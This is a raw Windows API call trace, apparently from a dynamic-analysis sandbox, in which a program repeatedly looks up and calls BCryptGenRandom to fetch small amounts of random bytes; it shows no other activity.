[0276.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.711] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.711] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.711] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.714] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d494a, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d494a) returned 0x0 [0276.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0276.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.724] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.724] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d497a, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d497a) returned 0x0 [0276.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 